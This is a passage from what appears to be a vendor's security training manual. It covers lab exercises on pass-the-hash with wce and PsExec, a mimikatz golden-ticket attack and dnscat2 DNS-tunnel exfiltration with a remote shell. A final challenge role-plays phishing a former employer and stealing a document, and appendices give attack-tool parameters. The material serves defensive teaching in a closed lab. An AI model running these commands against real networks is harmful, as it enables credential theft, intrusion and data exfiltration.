18. Execute the Attack.exe file remotely on Victim using PsExec.exe, this time without specifying a
user or password:
cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe
19. Verify if the process was executed properly by looking for the generated Attack.txt file
remotely:
dir \\192.168.100.121\C$
20. List the contents of the Attack.txt via:
more \\192.168.100.121\C$\Attack.txt

Lateral Movement
21. The results will show that the process was executed by the ACE202\Victim account. This proves
that the Pass-The-Hash technique was successfully utilized:
PASS-THE-HASH: PROCESS OWNER PROVES PASS-THE-HASH WAS SUCCESSFUL
22. List the logon sessions and NTLM credentials locally using wce:
cd wce_v1_41beta_universal
wce -l
23. This will list all logon sessions, which now also includes the Victim account:
PASS-THE-HASH: LOCAL LOGON SESSIONS AND NTLM CREDENTIALS

25. Remove the Attack.txt file via an elevated command prompt:
del c:\Attack.txt

27. Click on Start > Programs > Administrative Tools > Remote Desktops.
28. On the left panel, right-click Remote Desktops and select “Add New Connection...”
PASS-THE-HASH: REMOTE DESKTOP MANAGER

29. Enter the IP address of the Attacker machine, 192.168.100.111, on both the Server name and
Connection name fields.
Enter the logon information of the Administrator and click “OK”:
PASS-THE-HASH: SET UP REMOTE CONNECTION
30. Double-click on the newly created Remote Desktop connection on the left panel.
31. Using the Administrator account to connect to the Attacker machine creates a logon session on
the target. Do not click “Yes”.
PASS-THE-HASH: INITIATING RDP CONNECTION
32. Leave the Remote Desktop connection window open and switch to the Attacker machine.
33. On the command prompt, list the logon sessions and NTLM credentials again using wce:
wce -l
34. This will now list the Administrator account as well:
PASS-THE-HASH: ADMINISTRATOR SESSION LISTED

Lateral Movement
35. Copy the hashes of the Administrator account to the clipboard.

36. Using wce, switch the current NTLM credentials to Administrator:
wce -s Administrator:ACE202:[LM HASH]:[NTLM HASH]
37. Execute the Attack.exe file remotely on the Victim machine using PsExec.exe:
cd..
PSTools\PsExec.exe \\192.168.100.121 -c Attack.exe
38. Verify if the process was executed properly by displaying the contents of Attack.txt:
more \\192.168.100.121\C$\Attack.txt
The results show that the process was executed by the Administrator account.
39. Reboot the Attacker machine in preparation of the next exercise.

Exercise 16: Kerberos Golden Ticket Attack

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having
access to an account's password. Kerberos authentication can be used as the first step for lateral
movement into a remote system.
Golden Tickets for the domain can be obtained using the NTLM hash of the Key Distribution Service
account, KRBTGT. This account allows generation of TGTs for any account in Active Directory.
1. Access Attacker machine.
2. Open command prompt and run the following command:
pushd \\Server\C$
The pushd command accepts either a network path or a local drive letter and path. If a network
path is specified, pushd will create a temporary drive pointing to the specified network resource
and will change into the temporary drive.
3. The pushd command fails, as we currently have no access rights:
KERBEROS GOLDEN TICKET ATTACK: PUSHD COMMAND
4. We will need the SID of the KRBTGT service account. Run the following commands:
wmic useraccount where name='krbtgt' get SID > SID.txt

notepad SID.txt
5. This will open notepad, displaying the Object Security ID of the KRBTGT service account:
KERBEROS GOLDEN TICKET ATTACK: SID OF KRBTGT SERVICE ACCOUNT
Highlight the SID as shown in the screenshot. Do not close Notepad, as we require the SID during
the exercise.
6. In the command prompt, navigate to “C:\Tools”:
cd \tools
7. Open the hashes.txt file using Notepad:
notepad hashes.txt
Highlight the NTLM hash of user krbtgt(current-disabled). Leave the Notepad open, as we
require the contents for the next steps.
8. Back in the command prompt, navigate to the “Mimikatz” folder and start mimikatz.exe:
cd mimikatz\x64
mimikatz.exe

Lateral Movement
9. Once Mimikatz is started, the following screen will be shown:
KERBEROS GOLDEN TICKET ATTACK: MIMIKATZ
Note: Refer to Appendix B.14 on page 119 for a list of command examples in mimikatz.
10. Golden tickets can be created for valid domain accounts or for accounts that do not exist. We can
now paste the information we gathered earlier:
kerberos::golden /domain:ACE202.TrendMicro /rc4:fd7d8x751079c282116fbe7aac274079 /sid:S1-5-21-

1008503936-3139382480-897551679 /user:krbtgthacker /id:500 /ptt
User is used for the name of the user account the ticket will be created for. This can be an
existing account name, but it does not have to be.
RC4 stands for the NTLM hash, using the highlighted value from step 7.
SID will insert a SID into the SIDHistory attribute of the account in the ticket. This is useful to
authenticate across domains. This uses the SID value from step 5, without the last 4 characters.
ID for the RID of the account you will be impersonating, here we use the default administrator ID
of 500.
Using ptt allows to inject the created ticket into the current session.
Note: Please ensure, the “rc4” and “sid” values are the same as discovered in the notepads in steps
5 and 7. If not, please change those values accordingly.
11. Once executed, Mimikatz will show the following screen, indicating that the Golden ticket has
been successfully submitted:
KERBEROS GOLDEN TICKET ATTACK: MIMIKATZ SUBMITTED GOLDEN TICKET

12. The generated golden ticket can now be used. Launch a command prompt using the following
command:
misc::cmd
13. On the command prompt, type:
whoami
The result is ACE202\attacker as you are using the Attacker account.

14. Try to access Server's C: drive using:
pushd \\Server\c$
15. This time, we have the permissions to access the drive:
KERBEROS GOLDEN TICKET ATTACK: PUSHD COMMAND SUCCESSFUL
Notice we automatically switched into drive Y:. This is done via the pushd command, which
created the connection and mapped it temporarily to a new drive letter.
16. Navigate into Windows’ database directory:
cd windows\ntds
dir
You will be able to list the contents of this system folder.

17. Remotely execute the command prompt on the Server machine:
C:\Tools\PsTools\PsExec.exe \\Server\ cmd.exe
18. This will return the command prompt from Server onto the Attacker machine. Type in the
following commands to check for their values:
hostname
whoami
ipconfig

Lateral Movement
19. As a result, you should be presented with the following information:
KERBEROS GOLDEN TICKET ATTACK: SUCCESSFULLY INFILTRATED THE SERVER
Hostname will be Server, as the command prompt is running on the Server machine. This is also
the reason why ipconfig returns 192.168.100.131
More important however is the output of the command “whoami”. The current user is changed
to the fake user we created in step 10, krbtgthacker.
Even though the user is non-existent, we were still able to list a system directory in step 16, which
proves we have Administrator rights, thanks to the RID of 500 (see step 10).
Note: As a summary, if the SID and NTLM hash of the KRBTGT service account can be acquired, it is
very easy to gain access and elevate the privileges of an unknown user.


Chapter 4: Final Challenge
Final Challenge
In the final challenge for Advanced Threat Defense - Cybercrime Operations & Attack
Methodologies,
the student will demonstrate the ability of:
• Infiltrating a target environment
• Exfiltration of documents

Final Challenge
Lab 1: Perform an APT Attack
Task
The final challenge consists of two tasks:
• Infiltrate a target network
• Exfiltrate an important document
Environment
The final challenge uses a new environment:
FINAL CHALLENGE: ENVIRONMENT
Virtual Machine Account Password

WKS-Harry harry @Trend@
FINAL CHALLENGE: LOGIN CREDENTIALS
Background Information
In this exercise, you will be playing the role of a hacker named Harry. Your goal is to look for and
collect important documents from your previous employer who just recently fired you.
Task 1: Infiltrate Subnet 1

Due to an incorrectly sent email from "George@ACE202.TrendMicro", it has come to your
attention that George, a high-ranking employee, has a very important presentation coming up in
a few hours.
Based on the information you have read from the email, George is making last minute changes to
his presentation using data that he's requesting from outsourced developers. These outsourced
developers are using the email address “Instructor@ACE202.TrendMicro” to communicate with.
George also mentioned that he urgently needs the updated version of the "ACE202.Exercise.doc"
file; he will be monitoring his email from the time he sent the email up to one hour prior to his
presentation. He also requested that they use "ACE-202 Exercise" as the subject so he can
immediately spot the email.
Prior to this, since you have worked for this company before, you know the following:
• You know of five computers that you can utilize for this operation.
• The mail server’s IP address is 192.168.33.91.
• Servers of this organization are isolated in their own subnet (192.168.33.0/24).
These servers cannot be accessed from the Internet directly except for the SMTP mail server.
However, George's computer can access a computer named SRV-Door on the server subnet.
• The server, where important documents are stored, is SRV-Doc. This server also belongs to
the same subnet as that of the SRV-Door.
• On the same subnet of the servers is a domain controller, SRV-DC, whose user frequently
connects to the SRV-Doc to upload important files.
Objectives:
Use any of the techniques you've learned from this course to infiltrate the target user's
machine using the resources you have.
• Gain access to George's machine.
• Copy your hacking tools to the infected machine.
Guide Questions:
What is the best point of entry knowing that you have the following at your disposal:
• Email address, name, and IP address of an employee
- Email: George@ACE202.TrendMicro
- Name: George
- IP Address: 172.22.22.61
• Critical information and "human" vector that can be exploited
- George is waiting for an "ACE202.Exercise.doc" file
• Trojan backdoor that grants remote access to an attacker
- Trojan: C:\Tools\replace-sethc-with-cmd.exer
Final Challenge
Task 2: Infiltrate Subnet 2 and retrieve Documents

Now that you have access to George's machine, determine how you can infiltrate the internal
network of servers.
You know there are important documents stored on SRV-Doc, particularly a DOCX file. You will
need to find a way to get to the SRV-Doc machine in order to get that specific DOCX file, which
name and location are currently unknown.
There are three computers in the internal network. Since you have worked for this company
before, you know one of your ex-colleagues uses the SRV-DC machine to constantly access the
SRV-Doc machine.
Objectives
Use any of the techniques you've learned from this course to infiltrate the organization's network
and retrieve the DOCX file from the SRV-Doc document server:
• Assume George's identity to gain access to the other resources on the network:
- Sniff for passwords
- Use hash passing
• Gain access to the SRV-Door and/or the SRV-Doc machines:
- Determine if George has access to the machines you want to infiltrate; or
- Assume the identity of other people who have access to the resources you need; or
- Create user accounts that have the credentials you need.
• Copy document files from the SRV-Doc machine and determine which ones are useful.
Guide Questions:
• With access to George's machines, what information can be compromised using your hacking
tools?
- Can you retrieve passwords?
- Do you have ready access to other resources on the network?
• By exploring your options, what errors or roadblocks did you encounter?
Are these errors easily bypassed or solved using any of the techniques you've learned?
Optional Activities
Appendix A: Optional Activities

This appendix contains a optional activity, which can be utilized for C&C communication,
data exfiltration or any other IP communication:
• DNS Tunneling
Optional Activities
DNS Tunneling
This optional activity demonstrates how to utilize DNS tunneling.
Of importance here is that any IP traffic, no matter which nature, can be encapsulated within the DNS
protocol. This allows for attackers to hide their communication, such as C&C, Lateral Movement
activities or Data Exfiltration, and ensure it is not detected easily by their targets.
For this exercise we will utilize the tool dnscat2 to create a DNS tunnel and perform internal
reconnaissance and data exfiltration.
Note: Refer to Appendix B.15 on page 119 for further dnscat2 command and parameter examples.
1. Access the Ubuntu virtual machine.

2. Open a new terminal.
3. Stop Network Name Resolution manager with the following command:
sudo systemctl stop systemd-resolved
With this command, systemd-resolved disables Network Name Resolution Manager. This allows us
to utilize netcat binding to dnscat.
4. Navigate to “dnscat2/server” folder:
cd dnscat2/server
5. Start dnscat2 server and connect to the domain name supplier.tm. Type the command:
sudo ruby ./dnscat2.rb supplier.tm
6. This will start dnscat2:
DNS TUNNELING: START DNSCAT2 SERVER

8. Open Wireshark and select Capture > Start. This will start a packet capture.
9. Open a command prompt and run the commands:
cd Desktop\Exercise\dns_tunneling
dnscat2.exe supplier.tm
10. This will execute dnscat2 with the established domain name to create a session:
DNS TUNNELING: START DNSCAT2 CLIENT
Note: If you encounter issues establishing a connection, such as “Too big”, please ensure the DNS
server service on the server machine is running.

12. On the dnscat2 terminal, a new window has been created:
DNS TUNNELING: NEW WINDOW
The line New window created: 1 indicates that a new session has been established.
The dnscat2 UI calls their sessions “windows”. The default window is called the 'main' window.
13. Type the following command to get a list of all available windows:.
window
14. You'll note that there are two windows: window 0 is the main window, and window 1 is the
listener (technically referred to as the “tunnel driver”).
DNS TUNNELING: WINDOW OVERVIEW
15. From any window that accepts commands (main and command sessions), you can type help to
get a list of commands:
help
16. Use the window command to interact with window 1, which is the established session with the
Victim machine:
window -i 1
Optional Activities
17. Download a file from Victim into the dnscat2 directory:
download finance.txt
Press <Enter> once completed.
Note: dnscat2 will only be able to download files which are located in the same folder as the
dnscat2 client. If you wish to download files currently located in the “Downloads” folder, you
will either need to execute dnscat2 from that directory or move the files into the dnscat2
directory using a shell.
18. The dnscat2 console on Ubuntu will display the success of the download:
DNS TUNNELING: SUCCESSFUL DOWNLOAD, SERVER CONSOLE
19. The download can also be seen on the dnscat2 console on the Victim machine:
DNS TUNNELING: SUCCESSFUL DOWNLOAD, CLIENT CONSOLE
20. Switch back to Ubuntu machine.

21. Open a new terminal.
Do not close the terminal of dnscat2.
22. Open the downloaded file from the dnscat2 folder:
cat dnscat2/server/finance.txt
23. This should show the contents “This is a sample text”:
DNS TUNNELING: FINANCE.TXT CONTENTS
24. Switch back to the dnscat2 terminal window.

25. Create a new session to access the command prompt of the Victim machine:
shell
26. Once executed, press <CTRL>+<Z> followed by <ENTER> to go back to the main window of
dnscat2.
27. Check the available sessions with the command.
window
28. The output should now lists 2 sessions:
DNS TUNNELING: NEW WINDOW MARKED WITH [*]
You can see the [*] icon, that means that there's been activity since the last time we looked at
them.
29. Interact with the new created session:
window -i 2
30. Run the following commands to confirm whether the shell is executed on the Victim machine:
whoami
ipconfig
31. Both commands will return information about the Victim machine:
DNS TUNNELING: SHELL COMMANDS ON REMOTE MACHINE
32. Go back to the main window of dnscat2 by pressing <CTRL> + <Z> followed by <ENTER>.
34. Open Wireshark. We can confirm, by analyzing the recorded packets, that all activities between
dnscat2 client and server were encapsulated within the DNS protocol:
DNS TUNNELING: WIRESHARK PROVES DNS PROTOCOL USAGE
Optional Activities

36. Terminate session 2, which is the command prompt on Victim:
kill 2
37. Wait for a few seconds to finish.

It is normal to receive error messages during this process.
38. List the remaining open windows with:
window
39. Interact and shutdown window 1 via:
window -i 1
shutdown
Commands & Parameters
Appendix B: Commands & Parameters

This appendix outlines basic commands and parameters for:
• netcat
• Pupy
• net
• gsecdump
• samdump2
• John-the-Ripper
• Powershell Empire
• PsExec
• At
• schtasks
• wmic
• netsh
• wce
• mimikatz
• dnscat2
Netcat
Netcat offers multiple parameters for specific actions:
Parameter Description
-l Listen mode (default: Client)
Listen harder; only supported on Windows OS. This will force
-L netcat to continue listening after a client disconnects.
-u UDP mode (default: TCP)
-p Port to either listen on or connect to; depending on listen mode.
-e Program to execute after establishing connection; connecting

STIN and STDOUT to the program
-n Disable DNS lookups on names of machines
Zero I/O Mode; don’t send any data, just emit a packet without
-z payload
Timeout for connections; netcat will wait N seconds for the
-wN connection. Netcat will stop running if connection is not
established within that time.
-v Verbose; print messages on Standard Error
-vv Very Verbose; print more details on Standard Error
NETCAT PARAMETERS
Pupy
Pupy is a popular choice for Remote Access Tools, providing a feature set for establishing C&C
communication as well as lateral movement. The project page of Pupy can be found at https://
github.com/n1nj4sec/pupy.
Command / Parameter Description

pupygen.py Script to create remote agent for reverse connections.
pupysh.py Script to start the Pupy shell, which will be listening for clients
help list available commands in Pupy shell
info list information about current sessions
shell start remote shell on target and bring shell to Pupy
exec notepad.exe execute [Process] on target machine, here: notepad.exe
migrate -p explorer.exe migrate the Pupy client process into a different process for
obfuscation, here: explorer.exe
getpid list the process id of the Pupy client
sessions list all current sessions
sessions -k 1 kill a session with specific id, here: 1
PUPY COMMANDS & PARAMETERS
net
The built-in command “net” provides a multitude of different options and parameters. The following
table provides a list of examples, how “net” can be utilized:
net use connect to network shares
net use X: \\192.168.0.1\share connect to network share \\192.168.0.1\share, and map it as
/persistent:yes drive X: permanently (persistent:yes)
net use X: /delete delete the mapped drive at X:
create or delete local users or display information of a specific
net user
user
net user bob test /add add a new user “bob” with password “test”
net user bob /delete delete user “bob”
net user bob display information about user “bob”
net localgroup create, delete user groups or add users to a specific group
show information and users belonging to the group
net localgroup administrators “administrators”
net localgroup administrators add user “bob” to the administrators group
bob /add
NET COMMANDS & PARAMETERS
gsecdump
gsecdump allows to dump password hashes of local users on Windows operating systems:
-h display all available parameters
-a dump everything
-s dump hashes from SAM / Active Directory
-l dump LSA secrets
-u dump hashes from active logon sessions
-w dump wifi connections
-S force elevation to SYSTEM
GSECDUMP PARAMETERS
samdump2
samdump2 allows dumping password hashes:
-h display overview of available parameters
-d display debug information
-l extract all available hashes
-o output the hash dumps into a file
SAMDUMP2 PARAMETERS
John-The-Ripper
John-the-Ripper can be utilized to try to crack passwords using the brute force or dictionary
techniques. Below table lists few of the important parameters for john:
no parameter provided display help and list all available parameters
-format specifies the format of the passed information, e.g. nt, md5 etc.
-wordlist specify a wordlist to use
-pot specify a different pot file than john.pot
JOHN-THE-RIPPER PARAMETERS
Powershell Empire
Powershell Empire allows injection of malicious code into the memory, by providing loaders for the
Victims. The project page of Powershell Empire can be found at https://github.com/EmpireProject/
Empire
The table below lists few examples of commands, which can be utilized within Powershell Empire:

help list available options and help for the currently selected module
info list information and available parameters for the selected module
execute run the currently selected module
shell <command> run a shell command on the remote target
back navigate up one level
set [parameter] [value] set a parameter for a module to a specific value
rename [old] [new] rename agent
listeners display all currently running listeners
uselistener [name] select a specific listener
uselistener <space><tab><tab> list all available listener modules
usestager [name] select a specific stager
usestager <space><tab><tab> list all available stager modules
agents list all currently running agents
interact [agent name] interact with a specific agent connection
usemodule [name] select a specifc module
usemodule <space><tab><tab> list all available modules
POWERSHELL EMPIRE COMMANDS
PsExec
PsExec, of the Sysinternals Suite, allows remote code execution of target machines. Further
information can be found at https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.
no parameter provided help overview of all available parameters
specify target machine, if not specified it will run on local machine.
computer (*) can be specified for all computers in current domain
-c copy the specified program to the target prior to execution
-h try to elevate program execution
-s run the process with SYSTEM account
-u specify user to run process as
-p specify password for user
PSEXEC PARAMETERS
at
The at command allows to remotely configure scheduled tasks on Windows operating systems.
/? print help for at command
\\computername specify target machine to run task on
time specify time when scheduled task should run
command specify the command to run at scheduled time
/interactive allow the task to interact with desktop session
/delete deletes a task, id has to be specified
/every:[date] run the scheduled task every hour / day / week / month
AT PARAMETERS
B.10schtasks
schtasks has superseded the at command on newer Windows operating systems.
no parameter provided list all current scheduled tasks
/? display list of commands available
/RUN run a specific task
/QUERY query information about a specific task
/S specifies the remote system
/TN specify the task name querying / running / deleting
WMIC PARAMETERS
B.11 wmic
wmic - Windows Management Interface Console - provides a full feature set to manipulate any data or
processes on Windows operating systems. As the list of options is very extensive, the below table
focuses on explanation on parameters used throughout the exercises.
wmic -? lists all available options for wmic
/node: specify the target machine to connect to
/user: specify the user for the connection
/password: specify the password for the selected user
process call create “name” create and execute a new process “name”
WMIC PARAMETERS
B.12netsh
The netsh tool is a built-in command line, providing access to network related configuration.
/? list all available options
advfirewall change settings of Windows Firewall
advfirewall reset reset firewall to default settings
advfirewall firewall adjust profile of firewall
portproxy set up port proxy, also known as port forwarding or NAT
portproxy add add a new port forwarding rule
interface change configuration of a network interface
interface set interface
name=”lan1” configure the interface called “lan1”
NETSH COMMANDS & PARAMETERS
B.13wce
Windows credentials editor allows password hash dumps, displaying cleartext passwords as well as
passing the hash on Windows operating systems.
-? list all available options
-s change current NTLM credentials
-l list all available NTLM credentials
-r same as -l, but refreshes automatically every 5 seconds
-w dump cleartext passwords
-k read kerberos tickets from file
WCE PARAMETERS
B.14mimikatz
A well known tool, mimkatz can be used to extract plaintexts passwords, hashes, PIN codes and
kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build
Golden tickets. The project page can be found at https://github.com/gentilkiwi/mimikatz.

privilege::debug try to elevate privileges
coffee display a nicely formatted, hot coffee
kerberos:: list all available functions from kerberos module
kerberos::golden run the function “golden”
sekurlsa:: list all available functions from sekurlsa module
sekurlsa::logonpasswords dump passwords from current logon sessions
process:: list all available functions from process module
misc:: list all available functions from misc module
misc::cmd call command prompt
misc::regedit call registry editor
MIMIKATZ COMMANDS & PARAMETERS
B.15dnscat2
dnscat2 is a tool to create tunnel via DNS traffic, allowing to hide malicious activities within a valid
protocol. The project page can be found at https://github.com/iagox86/dnscat2.

help display list of available options in current module
window list all available sessions / windows
window -i 1 interact with window “1”
download [file] download “file”, located in dnscat2 folder
shell open remote shell of session / window
kill -i 1 kill window with id “1”
DNSCAT2 COMMANDS & PARAMETERS
Protocol Response Codes
Appendix C: Table of Contents

This appendix lists all items within this document:
• Tables
• Images and screenshots
Table of Contents: Tables
Table of Contents: Tables
Introduction
Class Setup: Virtual Machine Descriptions ........................................................................ 9
Class Setup: User Credentials ............................................................................................ 9
Point of Entry
Command & Control
Lateral Movement
ophcrack: Accounts with Passwords “not found” ............................................................. 44
MAC and IP Address Mapping ........................................................................................... 49
Privilege Escalation: Process Integrity Level ..................................................................... 61
Final Challenge
Final Challenge: Login Credentials .......................................................................................... 101
Appendix: Optional Activities
Appendix: Commands & Parameters

Netcat Parameters ..................................................................................................................115
Pupy Commands & Parameters ..................................................................................................... 115
net Commands & Parameters ........................................................................................................ 116
gsecdump Parameters ............................................................................................................ 116
Samdump2 Parameters ..................................................................................................................117
John-The-Ripper Parameters .........................................................................................................117
Powershell Empire Commands ............................................................................................... 118
PsExec Parameters .................................................................................................................. 118
AT Parameters ......................................................................................................................... 119
WMIC Parameters .......................................................................................................................... 119
WMIC Parameters .......................................................................................................................... 119
netsh Commands & Parameters ....................................................................................... 120
wce Parameters ................................................................................................................ 120
mimikatz Commands & Parameters ...................................................................................... 121
dnscat2 Commands & Parameters ........................................................................................ 121
Appendix: Table of Contents
Table of Contents: Images and Screenshots
Introduction
Trend Micro Training Cloud Access: Training Area ........................................................... 7
Trend Micro Training Cloud Access: List of RDP Files ................................................... 8
Trend Micro Training Cloud Access: Unknown Publisher Warning ................................... 8
Trend Micro Training Cloud Access: vApp Overview ......................................................... 8
Class Setup: Virtual Environment ...................................................................................... 9
Accessing The Virtual Machines: Open the vApp .............................................................. 10
Accessing the Virtual Machines: vApp Startup.................................................................. 10
Accessing The Virtual Machines: “Virtual Machines” Tab .................................................... 11
Point of Entry
Preparing Email: Preparing RTLO ...................................................................................... 15
Preparing Email: Placing RTLO Character ......................................................................... 15
Preparing Email: Text Changes With RTLO Applied .......................................................... 16
Preparing Email: Set Location For LTRO Character. ......................................................... 16
Preparing Email: Text Changes With LTRO Applied .......................................................... 16
Preparing Email: Rename Payload.exe ................................................................................... 17
Preparing Email: File Renamed ............................................................................................... 17
Preparing Email: Change View of Windows Explorer ............................................................ 17
Sending Email: Account Selection ............................................................................................ 18
Sending Email: Viewing Account Settings ........................................................................ 18
Sending Email: Outgoing Mail Server Settings ..................................................................... 18
Sending Email: Confirm SMTP Settings ............................................................................ 18
Sending Email: Spoofing Email Sender ............................................................................. 19
Sending Email: Attaching Malicious File................................................................................ 19
Sending Email: Malicious Email Received ......................................................................... 20
Sending Email: Saving Attachment ................................................................................... 20
Sending Email: Confirmation of No Malicious Files in %tmp% ........................................ 20
Sending Email: Open Malicious File ....................................................................................... 21
Command & Control

TCP Bind Shell: Start Netcat .............................................................................................. 25
TCP Bind Shell: Established Connection with CMD Passed Through ................................. 26
Reverse Shell: Communication Established ....................................................................... 27
Reverse Shell: Successful Command Execution on Victim ................................................ 27
Pupy Rat: Create Backdoor.exe ......................................................................................... 28
Pupy Rat: Shell Started, Awaiting Incoming Connections ................................................. 29
Pupy Rat: Task Manager Shows Backdoor.exe Running ................................................... 29
Pupy Rat: Pupy Shell Has Received Communication ......................................................... 30

Pupy Rat: Info Output ........................................................................................................ 30
Pupy Rat: Shell Access ..................................................................................................30
Pupy Rat: Migration Successful, New Session Created..................................................... 31
Pupy Rat: Backdoor.exe Not Shown In Task Manager....................................................... 32
Pupy Rat: Task Manager Column Selection ....................................................................... 32
Pupy Rat: Explorer.Exe PID ................................................................................................ 32
Pupy Rat: PID of Current Session ....................................................................................... 32
Lateral Movement
LM & NTLM Hashes: Hashes of Empty Passwords............................................................. 37
LM & NTLM Hashes: LM Hash Case-Insensitive ................................................................. 38
LM & NTLM Hashes: LM Hash 7 Character Split ................................................................ 39
LM & NTLM Hashes: LM Hash 14 Character Limitation ..................................................... 39
LM & NTLM Hashes: Local Security Policy Management .................................................. 40
LM & NTLM Hashes: Security Policy on Windows 7 Preventing LM Hash Being
Stored ................................................................................................................................41
ophcrack: Select Components To Install ............................................................................ 43
ophcrack: Select PWDUMP File ......................................................................................... 43
ophcrack: Registration of XP free fast Table ................................................................ 44
John-The-Ripper: Brute Force.......................................................................................45
John-The-Ripper: John.pot Stores Successfully Cracked Passwords ............................45
Cain & Abel Installation: WinPcap ..................................................................................... 46
Cain & Abel Installation: Setup WinPcap Driver at Boot ................................................... 46
ARP Cache: Domain Network “Connected” ....................................................................... 47
ARP Cache: Attacker Not Listed Yet............................................................................. 47
ARP Cache: Attacker Is Listed Once Pinged .................................................................. 48
ARP Poisoning: Cain & Abel Enable Sniffer ........................................................................ 48
ARP Poisoning: Sniffer Tab ................................................................................................. 48
ARP Poisoning: Scanning MAC Addresses .................................................................... 48
ARP Poisoning: Scanning All Hosts ..................................................................................... 49
ARP Poisoning: Scan Results ......................................................................................... 49
ARP Poisoning: APR Tab ............................................................................................... 49
ARP Poisoning: Add To List ........................................................................................... 50
ARP Poisoning: Selecting the Targets ........................................................................... 50
ARP Poisoning: Targets Listed ...................................................................................... 50
ARP Poisoning: Start Poisoning ......................................................................................... 51
ARP Poisoning: Passwords Tab ......................................................................................... 51
ARP Poisoning: Displaying Passwords ................................................................................ 52
ARP Poisoning: Stopping Activities .................................................................................... 52
Powershell Empire: Start Screen ....................................................................................... 53
Powershell Empire: Starting Listener ...........................................................................54
Powershell Empire: List of Available Stagers ..................................................................... 54

Powershell Empire: Stager File Exported ........................................................................... 55
Powershell Empire: Contents of LNK File .......................................................................... 55
Powershell Empire: Agent Created .................................................................................... 56
Powershell Empire: List All Active Agents ......................................................................... 56
Powershell Empire: Agent Successfully Renamed ............................................................. 57
Powershell Empire: Executing Remote Shell Commands .................................................. 57
Powershell Empire: Sysinfo Command .............................................................................. 57
Privilege Escalation: Allchecks Module Info ...................................................................... 59
Privilege Escalation: Execute Allchecks Module ........................................................... 60
Privilege Escalation: BypassUAC Module Parameters ....................................................... 60
Privilege Escalation: Execute BypassUAC Module ............................................................ 61
Privilege Escalation: BypassUAC Successful ...................................................................... 61
Privilege Escalation: Establish Connection With Escalated Admin Rights ......................... 62
Privilege Escalation: Schtasks Module Parameters ........................................................... 62
Privilege Escalation: Execute Schtasks Module ................................................................. 63
Privilege Escalation: Back Out From Module Into Agents Selection ................................. 63
Privilege Escalation: Windows 7 Task Scheduler Library ................................................... 63
Privilege Escalation: “Updater” Task Properties................................................................ 64
Privilege Escalation: Inactive Agent Sessions .................................................................... 64
Privilege Escalation: Remote Shell Command Hostname .................................................. 65
Privilege Escalation: Remote Shell Command Whoami..................................................... 65
Privilege Escalation: Powerdump Module Output ............................................................ 66
Privilege Escalation: Reveal User Account Credentials From Memory Using Mimi-
katz .........................................................................................................................66
ARP Poisoning: Valid HTTP Website .................................................................................. 67
ARP Poisoning: Padlock On HTTPS Websites ..................................................................... 67
ARP Poisoning: Certificate Details ..................................................................................... 68
ARP Poisoning: Delete Browsing History ........................................................................... 68
ARP Poisoning: HTTP Passwords Successfully Intercepted ..........................................69
ARP Poisoning: Spoofed Website Certificate ...............................................................69
ARP Poisoning: Certificate Errors .................................................................................70
ARP Poisoning: Certificate Details ................................................................................70
ARP Poisoning: Certification Path ........................................................................................... 71
ARP Poisoning: HTTPS Password Successfully Intercepted .............................................. 71
ARP Poisoning: Stopping Activities ......................................................................................... 71
PsExec: Run Ipconfig Remotely .......................................................................................... 72
PsExec: Remotely List Directories ...................................................................................... 73
PsExec: Remote Execution Return Result 0 ....................................................................... 73
PsExec: Attack.txt Was Dropped, Attack.exe Successfully Executed Remotely ................ 73
PsExec: Attack.txt Successfully Deleted ...................................................................... 74
PsExec: Process Owner Changed To System ..................................................................... 75
PsExec: Local Hash Dump With Samdump2 ...................................................................... 75

PsExec: Receive Remote Hash Dumps ............................................................................... 76
PsExec: Event Viewer Displaying Information About PsExeSVC Service ........................... 76
PsExec: Event Viewer Displaying Information on User Log In Status ................................ 77
AT: Copy Attack.exe ..................................................................................................... 78
AT: Successfully Scheduled Task Remotely. ................................................................ 79
AT: Confirm Creation of At1.job ........................................................................................ 79
AT: Remote Task Executed Successful ......................................................................... 79
AT: Scheduled Task History ................................................................................................ 80
WMIC: Executing Attack.exe Remotely ...................................................................................81
WMIC: Display Event Viewer Information ......................................................................... 82
WMIC: Enable WMI Activity Trace And Clear Logs ............................................................ 83
WMI: WMI Activity Trace Recorded WMIC Activity .......................................................... 83
Port Forwarding: FTP Denied Access Based on Source IP ................................................. 84
Port Forwarding: Successfully Logged in to FTP Server ................................................85
Remote RDP: Connection Failed ........................................................................................ 86
Remote RDP: Manipulating Registry Keys and AdvFirewall Settings With PsExec ........... 86
Remote RDP: Identity Warning .......................................................................................... 87
Pass-The-Hash: Copy LM & NTLM Hash............................................................................. 89
Pass-The-Hash: Wce -W Displays Account Details in Cleartext ......................................... 89
Pass-The-Hash: Wce -S Successfully Changed NTLM Credentials ..................................... 90
Pass-The-Hash: Access Granted By Replacing NTLM Credentials ..................................... 90
Pass-The-Hash: Process Owner Proves Pass-The-Hash Was Successful ........................... 91
Pass-The-Hash: Local Logon Sessions And NTLM Credentials .......................................... 91
Pass-The-Hash: Remote Desktop Manager ...................................................................... 91
Pass-The-Hash: Set up Remote Connection ...................................................................... 92
Pass-The-Hash: Initiating RDP Connection ........................................................................ 92
Pass-The-Hash: Administrator Session Listed.............................................................. 92
Kerberos Golden Ticket Attack: Pushd Command ............................................................. 94
Kerberos Golden Ticket Attack: SID of KRBTGT Service Account .................................94
Kerberos Golden Ticket Attack: Mimikatz ......................................................................... 95
Kerberos Golden Ticket Attack: Mimikatz Submitted Golden Ticket ................................ 95
Kerberos Golden Ticket Attack: Pushd Command Successful ......................................96
Kerberos Golden Ticket Attack: Successfully Infiltrated The Server ............................ 97
Final Challenge
Final Challenge: Environment ................................................................................................. 101
Appendix: Optional Activities

DNS Tunneling: Start dnscat2 Server ................................................................................ 107
DNS Tunneling: Start dnscat2 Client ..................................................................................108
DNS Tunneling: New Window ............................................................................................108
DNS Tunneling: Window Overview ....................................................................................108

DNS Tunneling: Successful Download, Server Console .................................................... 109
DNS Tunneling: Successful Download, Client Console ..................................................... 109
DNS Tunneling: Finance.txt Contents ............................................................................... 109
DNS Tunneling: New Window Marked with [*] ...................................................................... 110
DNS Tunneling: Shell Commands on Remote Machine .......................................................... 110
DNS Tunneling: Wireshark Proves DNS Protocol Usage .................................................. 110
Appendix: Commands & Parameters
Appendix: Table of Contents

Cybercrime & Attack Methodologies Workshop Manual v3-2

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

